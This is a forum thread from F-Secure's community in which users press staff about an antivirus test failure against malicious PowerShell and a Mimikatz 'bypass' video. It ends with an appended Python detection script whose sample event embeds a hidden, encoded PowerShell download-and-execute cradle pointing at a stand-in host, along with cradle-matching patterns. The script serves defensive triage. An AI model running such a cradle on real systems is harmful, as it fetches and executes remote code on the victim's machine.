[ Staff needed ] F-Secure failure against PowerShell script whatever.. :D

Parham
Parham Posts: 103 Enthusiast

Hi F-Secure.

Would you guys please forward this article to the LABS?
https://www.mrg-effitas.com/current-state-of-malicious-powershell-script-blocking/

F-Secure failed at a test against a PowerShell script, whatever it is.. :D

Thanks!

Comments

  • Hi Parham,


    I have passed it to the lab's notice. Once I have any update, I will keep you posted.

  • Parham
    Parham Posts: 103 Enthusiast

    Hi again,

    Dear @Laksh, any reaction from LABS yet?

    Thanks!

  • Hi Parham,


    I'm following up again. Apologies for the delay, I'll update you once I hear from them.

  • Ukko
    Ukko Posts: 3,770 Superuser

    Hello,

    Sorry for my reply.

    Since there is a delay with an official response/explanation:

    I am just able to add that part of these "meanings" (which I was able to ask based on this topic) I also asked under another topic:

    https://community.f-secure.com/t5/F-Secure-SAFE/a-Youtuber-claimed-2months-ago/td-p/96356

    Where an official response has also not come yet.

    "Connections" between the topics can be about this certain tool (for recovering/catching passwords from Windows systems); with the meaning that if F-Secure "claimed" this tool as malware -> why did it not detect it?

    If it is not detected as malware -> why did F-Secure "claim" this tool as malware?

    With other meanings and my own feelings about the topic:

    --> even if it can be a valid concern, this certain publication probably has limitations... because there are too many steps which the user (?!) has to perform (by their own steps) for the trouble result (or if not -> I am not able to understand why none of them were detected by F-Secure or the system).

    And mainly F-Secure is able to prevent some (?!) certain tricks with PowerShell scripts (and more old-school things like HTML applications); I am able to think that F-Secure has detections/design for blocking PowerShell-based malware (with some of the meanings);

    But anyway, maybe it is possible to tweak or tick for a much higher 'security' level (and not increase false-positive results);

    --> but basically it can be something like "user launches Google Chrome and did trouble steps for the system" (mainly Google Chrome is not detected as malware with such meanings);

    I am able to think that with the recently introduced "headless Chrome"... it is quite possible to perform rogue tricks with a more valid view than 'certain tool and PowerShell scripts';

    --> also sadly there is a delay with an official statement (or clarification about F-Secure abilities OR, if required, their improvement steps);

    I recently also asked F-Secure Labs about a certain 'potentially dangerous concern', but received just a response which sounds like "we will not check such concerns and this is not interesting for us"; But basically.. indeed I am able to think that F-Secure has enough abilities to research and investigate the threat landscape or malicious threats only by their own steps (so.. not required to ask about something or 'ask for attention'); Because -> maybe they do not have enough time for such talking (while required to monitor the situation and so on).

    Thanks!

  • Parham
    Parham Posts: 103 Enthusiast

    Hi again.

    Dear Ukko, that YouTuber video.. is probably a joke; F-Secure cannot be bypassed just like that easily. They have a bug bounty; no one will publish a bug. If someone finds a real bug, he/she lets them know and earns the prize! Why publish it for nothing?

    @Laksh, dear Lakshmi, I think LABS needs another follow-up :D since your last follow-up was about a week ago.

  • Ukko
    Ukko Posts: 3,770 Superuser

    @Parham wrote:

    Hi again.

    Dear Ukko, that YouTuber video.. is probably a joke; F-Secure cannot be bypassed just like that easily. They have a bug bounty; no one will publish a bug. If someone finds a real bug, he/she lets them know and earns the prize! Why publish it for nothing?

    @Laksh, dear Lakshmi, I think LABS needs another follow-up :D since your last follow-up was about a week ago.

    Hello,

    Yes, my own feelings about the YouTube video -> I also placed them under the related topic (but I am able to think about such videos as about a PoC -> because quite likely it is possible to perform the related steps, but with a more 'critical' view). And indeed with "bypass" (even if it can be reported to F-Secure - if this is 'study' research; OR not); the most trouble with the YouTube video is that it is called a "bypass" (but it is possible to create more proper wording about it);

    And also I placed some "additional" ask-words based on this video (which I decided to re-ask under this topic too; both situations have 'Mimikatz' in the attack's design. And in one/some of the recent articles about Ransomware from F-Secure Labs/Blogs?! they claimed such a tool as malware (Microsoft also has related detections/signatures for variants of usage of this tool); So... if this is a valid statement -> why did F-Secure not detect the 'malware' with a basic/common view (?!).

    Basically -> it is good to know the official statement from F-Secure about such videos (if asked) anyway; not because this is critical, but because they are able to re-check it internally (with many high-quality specialists) and make sure that their design still works as expected (or, better to say -> with enough protection/security).

    At least.... if there is nothing to discuss... it is possible just to repeat words like (sorry for the quote from F-Secure Labs) "If you would like to know about the protection capability, our DeepGuard is able to monitor applications to detect potentially harmful changes to the system, and DeepGuard also makes sure that the user uses only safe applications. The safety of an application is verified from the trusted cloud service. If the safety of an application cannot be verified, DeepGuard starts to monitor the application behavior.";

    And if later there will be some troubles... which are not valid for such meanings... it is possible to re-ask "why was the design not improved?!";

    While there is a missing response -> a possible situation is when the 'concern' just did not meet investigation. And research will happen only if something is hacked/breached/leaked (a good design maybe, but not for situations when some information is already published and it is not required to 'create' something by one's own steps). With the current two topics -> both situations required many of the user's own steps, and if it will be with another design (when users do not perform suspicious steps by their own actions) -> probably F-Secure is able to react partly (based on my feelings);

    Thanks!

  • gancal
    gancal Posts: 21 F-Secure Product Expert

    Hi Parham,

    First and foremost, we would like to thank you for bringing this video to our attention.

    Our Labs analyst is still studying and working to fully understand the test case, attack vector and detection coverage based on the video. At the moment, we are unable to provide you with an ETA on when we will have something concrete. However, rest assured that this issue is not forgotten and we will definitely give you an update when we have one.

    Thank you for your patience and contribution to the different insights based on this video.

    Regards,

    Calvin Gan

    F-Secure Security Vulnerability Expert

  • Ukko
    Ukko Posts: 3,770 Superuser

    Hello,

    Sorry for my reply.

    @gancal, are there any updates about this? Are the study and full understanding completed?

    Also, as an additional ask:

    Under this F-Secure article (dated 01.03.2017): Fileless Malware.... points like these were noted:

    The attackers utilize Microsoft’s own tools, such as PowerShell, to carry out memory-based attacks through malicious macros that trigger PowerShell to load the malware onto the machine. Detecting these attacks can be hard, as the macros use evasion techniques and a fileless approach to evade file-based detection.
    We earlier published six tips for avoiding macro-based malware – that advice is still very much valid for fileless malware attacks. Our protection engines, including the behavior-based DeepGuard, already block these attack vectors.
    “DeepGuard offers exploit protection to mitigate the exploitation of legitimate applications. It also offers protection against script-based attacks by blocking the execution of the script. This all is essentially what DeepGuard detection is made of: using behavior indicators of compromise.”

    So, compared to the F-Secure solutions (or only Business solutions) of March -> are these words still valid? Or valid for DeepGuard 6?

    In general, does DeepGuard still 'offer exploit protection' to prevent/mitigate tricks with valid software and script-based attacks?

    Is it valid for such threats (or are only signature/fuzzy hashing useful there)?

    Thanks!
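The macro-to-PowerShell fileless chain quoted from the F-Secure article above is the kind of thing behaviour-based telemetry, rather than file signatures, has to catch. The following is an added example for this thread, not F-Secure's or DeepGuard's code; the event field names and the sample events are constructed assumptions, loosely modelled on process-creation telemetry. It triages events for three behaviour indicators: an Office parent launching PowerShell, an -EncodedCommand payload, and a download cradle in the decoded script.

```python
import base64
import re

# Constructed sample events (field names are assumptions, loosely Sysmon-like).
def _enc(ps):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "EXCEL.EXE", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String", re.I)
ENC_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Return the behaviour indicators seen in one process-creation event."""
    indicators = []
    if ev["image"].lower() != "powershell.exe":
        return indicators  # only PowerShell launches are in scope here
    if ev["parent"].lower() in OFFICE_PARENTS:
        indicators.append("office-spawned-powershell")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        indicators.append("encoded-command")
    # Search the command line minus the base64 blob (avoids chance matches) plus the decoded payload.
    if CRADLE_RE.search(ENC_RE.sub("", ev["cmdline"]) + (decoded or "")):
        indicators.append("download-cradle")
    return indicators

def triage(events):
    """Map event index -> indicators for every event that raised at least one."""
    return {i: ind for i, ev in enumerate(events) if (ind := score_event(ev))}
```

Only the first sample event raises indicators; the plain scheduled backup script and the cmd.exe launch stay silent, which is the false-positive balance the thread keeps coming back to.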

This discussion has been closed.